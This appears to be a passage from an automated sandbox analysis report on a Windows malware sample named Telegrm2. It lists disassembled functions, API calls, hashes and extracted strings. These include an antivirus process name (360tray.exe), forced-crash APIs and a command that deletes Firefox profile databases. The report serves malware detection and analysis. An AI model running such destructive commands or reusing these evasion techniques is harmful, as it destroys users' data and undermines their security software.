                                              • Part of subcall function 030A1BF0: socket.WS2_32 ref: 030A1C66
                                            • CreateEventA.KERNEL32 ref: 030AE32E
                                            • setsockopt.WS2_32 ref: 030AE383
                                            • CancelIo.KERNEL32 ref: 030AE38D
                                            • closesocket.WS2_32 ref: 030AE3A1
                                            • SetEvent.KERNEL32 ref: 030AE3AE
                                            • WaitForSingleObject.KERNEL32 ref: 030AE40D
                                            • Sleep.KERNEL32 ref: 030AE418
                                            • WaitForSingleObject.KERNEL32 ref: 030AE42B
                                            • WaitForSingleObject.KERNEL32 ref: 030AE438
                                            • Sleep.KERNEL32 ref: 030AE44E
                                              • Part of subcall function 030A1AC0: Sleep.KERNEL32 ref: 030A1ADC
                                              • Part of subcall function 030A1AC0: CloseHandle.KERNEL32 ref: 030A1AEB
                                              • Part of subcall function 030A1AC0: CloseHandle.KERNEL32 ref: 030A1AFA
                                              • Part of subcall function 030A1AC0: CloseHandle.KERNEL32 ref: 030A1B0C
                                              • Part of subcall function 030A1AC0: WSACleanup.WS2_32 ref: 030A1B12
                                              • Part of subcall function 030A1AC0: VirtualFree.KERNEL32 ref: 030A1B29
                                              • Part of subcall function 030A1AC0: VirtualFree.KERNEL32 ref: 030A1B4D
                                              • Part of subcall function 030A1AC0: VirtualFree.KERNEL32 ref: 030A1B6F
                                              • Part of subcall function 030A1AC0: VirtualFree.KERNEL32 ref: 030A1B9C
                                              • Part of subcall function 030A1AC0: VirtualFree.KERNEL32 ref: 030A1BB7
                                              • Part of subcall function 030A1AC0: VirtualFree.KERNEL32 ref: 030A1BD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: FreeVirtual$Event$CloseHandleObjectSingleSleepWait$Create$CancelCleanupResetStartupTimeclosesocketsetsockoptsockettime
                                            • String ID:
                                            • API String ID: 1609788701-0
                                            • Opcode ID: a40a648a15e51ccd5b7b77284d460eff80abdcc76f35266df226fc2260939395
                                            • Instruction ID: b0c00c77c709abae2f9977bf60b7d2b1652f57b8069ab6fe9dbdaca3c279bd16
                                            • Opcode Fuzzy Hash: a40a648a15e51ccd5b7b77284d460eff80abdcc76f35266df226fc2260939395
                                            • Instruction Fuzzy Hash: D1517E36211B808AE721DF75E85439D77B8F7857A4F505326EAAD47BA8CF38C605CB40
                                            Function 030AF1D0 Relevance: 15.1, APIs: 10, Instructions: 62sleepprocessstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CloseHandle$ProcessProcess32$CreateFirstNextOpenSleepSnapshotTerminateToolhelp32lstrcmp
                                            • String ID:
                                            • API String ID: 3983807665-0
                                            • Opcode ID: 9a4ad9ec79557f838d5c850d1e15d38df011c5af4594aac11a6b4254f04b6826
                                            • Instruction ID: d12f9e5c36ef082eaefc8084b1245182cdd2529087c59c8fd885d759abd5a1fb
                                            • Opcode Fuzzy Hash: 9a4ad9ec79557f838d5c850d1e15d38df011c5af4594aac11a6b4254f04b6826
                                            • Instruction Fuzzy Hash: C1217F35316A4182EB65CB66FC683AA73A5FB88BD4F489224C95E47798DF3CC205C704
                                            Function 030B902C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetStartupInfoW.KERNEL32 ref: 030B904D
                                              • Part of subcall function 030B537C: Sleep.KERNEL32(?,?,?,030B4907,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B53C1
                                            • GetFileType.KERNEL32 ref: 030B91B8
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 030B91F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                            • String ID: @
                                            • API String ID: 3473179607-2766056989
                                            • Opcode ID: 4ef9daa8ef8e328afaa7914443f25a4f1d3113b308b25f51eb380e23cebb4cf6
                                            • Instruction ID: e75a5fc357016d88010070fc81c9d9638cb182b3bf34caac227eafa7572ce0d3
                                            • Opcode Fuzzy Hash: 4ef9daa8ef8e328afaa7914443f25a4f1d3113b308b25f51eb380e23cebb4cf6
                                            • Instruction Fuzzy Hash: 2681AE72702B8086DB59CF28D99839977A8F745B74F488728DBBA433E1EB38C159C304
                                            Function 030A2AC0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 59stringprocessCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Process32$Nextlstrcmpi$CloseCreateFirstHandleSnapshotToolhelp32malloc
                                            • String ID: 360tray.exe
                                            • API String ID: 2114354-563812762
                                            • Opcode ID: 9bdbb94246f68bf99088d796db0f409c1b278a73bd766a0d55989b28f0cdda84
                                            • Instruction ID: 42d4d9cd401c36e06a83b89a3695fb8bb94f0b94db111a8997871d81664639b5
                                            • Opcode Fuzzy Hash: 9bdbb94246f68bf99088d796db0f409c1b278a73bd766a0d55989b28f0cdda84
                                            • Instruction Fuzzy Hash: 54215E21326B4082EB85DF26F86035A63A9F788F80F5CA521DE4A47754DF38C646C704
                                            Function 030A2F20 Relevance: 13.6, APIs: 9, Instructions: 99threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Window$Text$ByteCharCurrentMultiProcessThreadWide$Internal
                                            • String ID:
                                            • API String ID: 3111847906-0
                                            • Opcode ID: 0fdf438269659fc0fa65afeff1c2bec110f1865e7b9a251698ba59ba194f47bd
                                            • Instruction ID: f9f012ee9e5d330a9b08079242dcb46dda8599672df2dd0af5cffb8ebe70b18a
                                            • Opcode Fuzzy Hash: 0fdf438269659fc0fa65afeff1c2bec110f1865e7b9a251698ba59ba194f47bd
                                            • Instruction Fuzzy Hash: 9F31267A316B8087E751DF6AB81075AA399F784BD0F184238EE8A4BB54DF3CC145DB08
                                            Function 030AE723 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: NtRaiseHardError$RtlAdjustPrivilege$ntdll.dll
                                            • API String ID: 1646373207-3189222469
                                            • Opcode ID: ab13eb02454ac93fcd2d64e85cb7ad2ec888a7379b4bcbbceb6dd2d3d825901a
                                            • Instruction ID: 2833fa8ec9b70ba7f73f28ee332a4a7f55e2ac2377062241ee87c9eeacbf60a3
                                            • Opcode Fuzzy Hash: ab13eb02454ac93fcd2d64e85cb7ad2ec888a7379b4bcbbceb6dd2d3d825901a
                                            • Instruction Fuzzy Hash: 72013131622A5682EB11DBA5F464B89B369FB887D8F446111DA4D07735DF3CC24ECB04
                                            Function 030B1D10 Relevance: 12.1, APIs: 8, Instructions: 138memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(?,?,?,030AE182), ref: 030B1D50
                                            • VirtualAlloc.KERNEL32(?,?,?,030AE182), ref: 030B1D6D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: be4286c4da388d932c314d9cc8358ddcdd747aba37cb2460b1e4ae52cd661bf9
                                            • Instruction ID: 0f3488444310176b87e86da814048cf0615164a3be95d67881b6fe5d6f5dc163
                                            • Opcode Fuzzy Hash: be4286c4da388d932c314d9cc8358ddcdd747aba37cb2460b1e4ae52cd661bf9
                                            • Instruction Fuzzy Hash: FD517936322B4086DB99DB26E9A07A973B9FB88BC0F088425DE4E47B14EF38D551C744
                                            Function 030B9AB0 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _FF_MSGBANNER.LIBCMT ref: 030B9AD7
                                              • Part of subcall function 030BA4A4: _set_error_mode.LIBCMT ref: 030BA4AD
                                              • Part of subcall function 030BA4A4: _set_error_mode.LIBCMT ref: 030BA4BC
                                              • Part of subcall function 030BA244: _set_error_mode.LIBCMT ref: 030BA289
                                              • Part of subcall function 030BA244: _set_error_mode.LIBCMT ref: 030BA29A
                                              • Part of subcall function 030BA244: GetModuleFileNameW.KERNEL32 ref: 030BA2FC
                                              • Part of subcall function 030B4F94: ExitProcess.KERNEL32 ref: 030B4FA3
                                              • Part of subcall function 030B52FC: malloc.LIBCMT ref: 030B5327
                                              • Part of subcall function 030B52FC: Sleep.KERNEL32(?,?,?,030B9B11,?,?,?,030B9BBB,?,?,0000000D,030B4A1B,?,?,?,030B30B6), ref: 030B533A
                                            • _errno.LIBCMT ref: 030B9B19
                                            • _lock.LIBCMT ref: 030B9B2D
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,030B9BBB,?,?,0000000D,030B4A1B,?,?,?,030B30B6), ref: 030B9B43
                                            • free.LIBCMT ref: 030B9B50
                                            • _errno.LIBCMT ref: 030B9B55
                                            • RtlLeaveCriticalSection.NTDLL ref: 030B9B78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                            • String ID:
                                            • API String ID: 113790786-0
                                            • Opcode ID: d374b8f0b3e7e258cb6326930f3d37136e5381a3b784188c0de0977cb7647080
                                            • Instruction ID: 096d810b0fe8468ba4b07a64e1c191f0f8cb11a86de9656fa02b2d2b6b6df181
                                            • Opcode Fuzzy Hash: d374b8f0b3e7e258cb6326930f3d37136e5381a3b784188c0de0977cb7647080
                                            • Instruction Fuzzy Hash: DA21BE39617B4482EB55EBA1E954BEE72B8EBC4B84F189524DB464BA90CF3CC4408350
                                            Function 030B8A90 Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                                            Download Yara Rule
                                            APIs
                                            • __doserrno.LIBCMT ref: 030B8A9D
                                            • _errno.LIBCMT ref: 030B8AA5
                                            • _invalid_parameter_noinfo.LIBCMT ref: 030B8AB1
                                            • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,del /s /f %appdata%\Mozilla\Firefox\Profiles\*.db,?,?,030B408F), ref: 030B8AC2
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,del /s /f %appdata%\Mozilla\Firefox\Profiles\*.db,?,?,030B408F), ref: 030B8ACD
                                            • _errno.LIBCMT ref: 030B8ADA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$AttributesErrorFileLast__doserrno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2953107838-0
                                            • Opcode ID: b0c67d5a171c0daf404162055391b08e360b4d2cd3c25b2d574b94a9bb7004a1
                                            • Instruction ID: 0d83de49db216cb78eb7fa544d7bf2f8f74135f46109b18dab98157bc2b9f5d2
                                            • Opcode Fuzzy Hash: b0c67d5a171c0daf404162055391b08e360b4d2cd3c25b2d574b94a9bb7004a1
                                            • Instruction Fuzzy Hash: 54F06278613344CAFB59EFB49C507EF21BC5B80721F58D990CA614A2E1C7384480C721
                                            Function 02DCBF88 Relevance: 11.6, APIs: 9, Instructions: 379COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: f32bca21d81294411377cb91f11f61de43356bc1920308245a35a8ea1693f131
                                            • Instruction ID: 52d5ae53f4a861036b043f9df61bcf5ef649c36659b7a6f65526c2872d83d44e
                                            • Opcode Fuzzy Hash: f32bca21d81294411377cb91f11f61de43356bc1920308245a35a8ea1693f131
                                            • Instruction Fuzzy Hash: F8C1D530628B8A8FC719EF68D4943A9B7E1FB59304F20416EE58EC7356DB35D845CB81
                                            Function 030BBFB0 Relevance: 10.8, APIs: 7, Instructions: 305COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: f5817e27a620da2c21a26438e5daf05ff26ee82772f9b8fe58ca4b2e5b17eab1
                                            • Instruction ID: 9b79d333ac9e7018202498289e26ef2315962705207244daa60a7f70f140180b
                                            • Opcode Fuzzy Hash: f5817e27a620da2c21a26438e5daf05ff26ee82772f9b8fe58ca4b2e5b17eab1
                                            • Instruction Fuzzy Hash: 76C18136706B5595EB20DB62E484AEE77B8F7C9B88F8045268F8D47B14EF78C206C744
                                            Function 030A7CE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$mallocstd::exception::exception
                                            • String ID: bad locale name
                                            • API String ID: 4069110180-1405518554
                                            • Opcode ID: 550638547addd633d9fff7141d3bca1b33ad67c1255882bbde28ec603def4179
                                            • Instruction ID: 19642cfe7a526919fa8ea0c5082b03324ff4f7bc8e752100b1d3290ca690d7de
                                            • Opcode Fuzzy Hash: 550638547addd633d9fff7141d3bca1b33ad67c1255882bbde28ec603def4179
                                            • Instruction Fuzzy Hash: F5414A3AB02B4099EB15DBF8F8603DE33B6AB8474CF544525CE592BA98DF348169C384
                                            Function 02DC395C Relevance: 10.6, APIs: 7, Instructions: 109COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo_lockfree
                                            • String ID:
                                            • API String ID: 545175899-0
                                            • Opcode ID: 57a3e14ff19d228fc4fb1404de0338fa2b2075d3f3262c611f483b0a365b67db
                                            • Instruction ID: fd53c517b0702fe334c6dc2096ec3226d5393857b7a5f4015a3c967f50f72e27
                                            • Opcode Fuzzy Hash: 57a3e14ff19d228fc4fb1404de0338fa2b2075d3f3262c611f483b0a365b67db
                                            • Instruction Fuzzy Hash: F4314431504A0F8F8F59EFB588855AE77E6EF95310B21856EC85AD3350DF34C850CB91
                                            Function 030AD060 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$mallocstd::exception::exception
                                            • String ID: bad locale name
                                            • API String ID: 4069110180-1405518554
                                            • Opcode ID: 313f0e32c2ebebe2d1126992b8392d53e546b2894d241d5580ede04190ed898e
                                            • Instruction ID: 938c01aa294b4f853a07d12afb500ab50142998a2e8884aff218f7f64d208bf5
                                            • Opcode Fuzzy Hash: 313f0e32c2ebebe2d1126992b8392d53e546b2894d241d5580ede04190ed898e
                                            • Instruction Fuzzy Hash: A241163A702B40A9EB15DFA8F8A07EE33B8EB8479CF444565DE8D1BA58DE34C519C344
                                            Function 030B5128 Relevance: 10.6, APIs: 7, Instructions: 98COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                            • String ID:
                                            • API String ID: 3411037476-0
                                            • Opcode ID: 4c0320adc39819e85adfa6c8124f7a8662ce99c12a2c90df2385dd99eba56312
                                            • Instruction ID: 3a77811bdfdcfdf587cd8e0c2708c3632489b5a657bc6563901125127f4c1e67
                                            • Opcode Fuzzy Hash: 4c0320adc39819e85adfa6c8124f7a8662ce99c12a2c90df2385dd99eba56312
                                            • Instruction Fuzzy Hash: A931D231227B4081E651DF16FC9039973B8FB8AB94F485565DE8E47B64EF38C255C704
                                            Function 030B42A4 Relevance: 10.6, APIs: 7, Instructions: 93threadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B83F4: HeapCreate.KERNELBASE ref: 030B840A
                                              • Part of subcall function 030B83F4: GetVersion.KERNEL32 ref: 030B841C
                                              • Part of subcall function 030B83F4: HeapSetInformation.KERNEL32 ref: 030B843A
                                            • _RTC_Initialize.LIBCMT ref: 030B42D6
                                            • GetCommandLineA.KERNEL32 ref: 030B42DB
                                              • Part of subcall function 030B976C: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,030B42ED), ref: 030B9785
                                              • Part of subcall function 030B976C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,030B42ED), ref: 030B97DC
                                              • Part of subcall function 030B976C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,030B42ED), ref: 030B9817
                                              • Part of subcall function 030B976C: free.LIBCMT ref: 030B9824
                                              • Part of subcall function 030B976C: FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,030B42ED), ref: 030B982F
                                              • Part of subcall function 030B902C: GetStartupInfoW.KERNEL32 ref: 030B904D
                                            • __setargv.LIBCMT ref: 030B4304
                                            • _cinit.LIBCMT ref: 030B4318
                                              • Part of subcall function 030B47F4: FlsFree.KERNEL32(?,?,?,?,030B4382), ref: 030B4803
                                              • Part of subcall function 030B47F4: RtlDeleteCriticalSection.NTDLL ref: 030B9A43
                                              • Part of subcall function 030B47F4: free.LIBCMT ref: 030B9A4C
                                              • Part of subcall function 030B47F4: RtlDeleteCriticalSection.NTDLL ref: 030B9A73
                                              • Part of subcall function 030B9300: free.LIBCMT ref: 030B9351
                                              • Part of subcall function 030B537C: Sleep.KERNEL32(?,?,?,030B4907,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B53C1
                                            • FlsSetValue.KERNEL32 ref: 030B43B2
                                            • GetCurrentThreadId.KERNEL32 ref: 030B43C6
                                            • free.LIBCMT ref: 030B43D5
                                              • Part of subcall function 030B3D28: HeapFree.KERNEL32(?,?,00000000,030B4940,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B3D3E
                                              • Part of subcall function 030B3D28: _errno.LIBCMT ref: 030B3D48
                                              • Part of subcall function 030B3D28: GetLastError.KERNEL32(?,?,00000000,030B4940,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B3D50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$FreeHeap$ByteCharCriticalDeleteEnvironmentMultiSectionStringsWide$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValueVersion__setargv_cinit_errno
                                            • String ID:
                                            • API String ID: 125979975-0
                                            • Opcode ID: 23c5f0b11138c6abc614942027c364c002265e4856d4242448111925fa1aa96e
                                            • Instruction ID: fec2b9e9fd3d04afcf4f1a6b0b394eb120110d8b48b707e81b29bd960acbb0e4
                                            • Opcode Fuzzy Hash: 23c5f0b11138c6abc614942027c364c002265e4856d4242448111925fa1aa96e
                                            • Instruction Fuzzy Hash: 1431C328607701C6FBA5FBB358803EE21FCAF95B54F9C4665C95189293EF38C341927A
                                            Function 030B20E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ComputerNamelstrcpylstrlenwsprintf
                                            • String ID: SOFTWARE\%sW\$UnKnowW
                                            • API String ID: 2137660125-763317463
                                            • Opcode ID: dcea012c4cec8c2c86aa07fbe8fa18e7c6b084d16e7e0d36b23a3dafce76063e
                                            • Instruction ID: 89c28c47698f908108cefa32742e1cc1f8943c7cdc760ed22921c9c17669cc78
                                            • Opcode Fuzzy Hash: dcea012c4cec8c2c86aa07fbe8fa18e7c6b084d16e7e0d36b23a3dafce76063e
                                            • Instruction Fuzzy Hash: 36112131319A8181EB20DF16F8643DAA375FBD9784F845112DB8D47A68EF3DC249CB00
                                            Function 030ADCA0 Relevance: 10.5, APIs: 7, Instructions: 44filesynchronizationstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                            • String ID:
                                            • API String ID: 4202892810-0
                                            • Opcode ID: d38896a3890081b88ef905279f1f8f3bcd07668c588b65e7c678813c6d7bd9a0
                                            • Instruction ID: fb1de88f888edf646e593b974a2b7838dd38309b84119b64aed78460a02571cb
                                            • Opcode Fuzzy Hash: d38896a3890081b88ef905279f1f8f3bcd07668c588b65e7c678813c6d7bd9a0
                                            • Instruction Fuzzy Hash: AA115271316A4086EB55CF55F868729B7A4FB88BA4F049314EE6E07BA4DF7CC245CB04
                                            Function 030AFB30 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34sleeplibraryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030A2AC0: CreateToolhelp32Snapshot.KERNEL32 ref: 030A2AD6
                                            • LoadLibraryW.KERNEL32 ref: 030AFB48
                                              • Part of subcall function 030AF2D0: CreateFileW.KERNEL32 ref: 030AF303
                                            • FindWindowW.USER32 ref: 030AFB69
                                            • IsDlgButtonChecked.USER32 ref: 030AFB84
                                            • Sleep.KERNEL32 ref: 030AFB8F
                                              • Part of subcall function 030AF360: GetCurrentProcessId.KERNEL32 ref: 030AF3A0
                                              • Part of subcall function 030AF360: GetCurrentThreadId.KERNEL32 ref: 030AF3A8
                                              • Part of subcall function 030AF360: VirtualProtect.KERNEL32 ref: 030AF3CF
                                              • Part of subcall function 030AF360: VirtualProtect.KERNEL32 ref: 030AF3F6
                                              • Part of subcall function 030AF360: CreateProcessWithLogonW.ADVAPI32 ref: 030AF450
                                              • Part of subcall function 030AF360: VirtualProtect.KERNEL32 ref: 030AF475
                                              • Part of subcall function 030AF360: VirtualProtect.KERNEL32 ref: 030AF49C
                                              • Part of subcall function 030AF360: CloseHandle.KERNEL32 ref: 030AF4AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
